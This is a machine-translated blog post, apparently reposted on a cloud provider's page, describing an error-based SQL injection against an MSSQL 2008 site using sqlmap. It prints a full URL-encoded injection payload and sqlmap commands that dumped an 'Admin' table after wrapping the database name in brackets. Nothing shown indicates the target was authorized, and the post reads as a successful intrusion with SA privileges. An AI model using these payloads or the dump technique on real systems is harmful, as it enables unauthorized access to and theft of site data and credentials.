Sqlmap Injection Detection Experience 0x01

Source: Internet
Author: User

One day encounter a sqlinjection Point,mssql 2008, has turned on the error mode.
Immediately throw into the Sqlmap run, all the way smoothly, unexpectedly or SA's authority, thought luck really good, anyhow all get fixed.
databases, tables, columns are listed, but the –dump parameters are dead or alive.
Error "Unable to retrieve the number of entries for table ' Admin ' in database ' 2012_xxxx '"--x is Mosaic ha:)
Thought should be easy to fix, then find the manual injection method, test without fruit.
or back to sqlmap,-h. View Help, found that the-v parameter can specify the output verbosity, open to-V 3, found to show the payload, pound, directly open to-V 5, found to provide the entire HTTP request, no wonder the error, the original is returned 500, Using Firefox to open the full payload is a syntax error.

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20and%204416%3dconvert%28int%2c%28select%20char%28113%29%2bchar %28115%29%2bchar%28119%29%2bchar%28100%29%2bchar%28113%29%2b%28select%20isnull%28cast%28count%28*%29%20as% 20nvarchar%284000%29%29%2cchar%2832%29%29%20from%20%222012_xxxx%22..syscolumns%2c2012_xxxx. Sysobjects%20where%202012_xxxx. Syscolumns.id%3d2012_xxxx. Sysobjects.id%20and%202012_xxxx. sysobjects.name%3dchar%2884%29%2bchar%2866%29%2bchar%2895%29%2bchar%2865%29%2bchar%28100%29%2bchar%28109%29% 2bchar%28105%29%2bchar%28110%29%29%2bchar%28113%29%2bchar%28107%29%2bchar%28122%29%2bchar%28104%29%2bchar% 28113%29%29%29

is obviously a 2012 problem, that is, the wrong number in the library name as a parameter

In the URL of the library name plus double quotes wrapped, sure enough to burst the data.

Problem again, want me to explode data manually I can not, or to return to Sqlmap Ah, means to find a way to wrap up the name of the library, not let the system to parse it into a parameter

XTEST1:./sqlmap.py-u http://www.xxxx.cn/xxxx/detail.aspx?id=218–dump-d "' 2012_xxxx"-t ' Admin '

This time better, or error Unable to retrieve column names for table ' Admin ' in database ' "2012_xxxx", meaning that there is a return, but the library name is not correct.

XTEST12./sqlmap.py-u http://www.xxxx.cn/broadband/detail.aspx?id=218–dump-d "[2012_xxxx]"-t ' Admin '

I do not remember where the brainwave, the use of brackets wrapped, sure enough to succeed, dump out the entire table.

xconclusion: You can use the-v parameter to specify the output verbosity when using Sqlmap, and then view the payload directly in the browser, identifying the syntax error point and trying to improve it. In the case of a system miscalculation, the name of the library name is available in brackets.

Sqlmap Injection Detection Experience 0x01

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.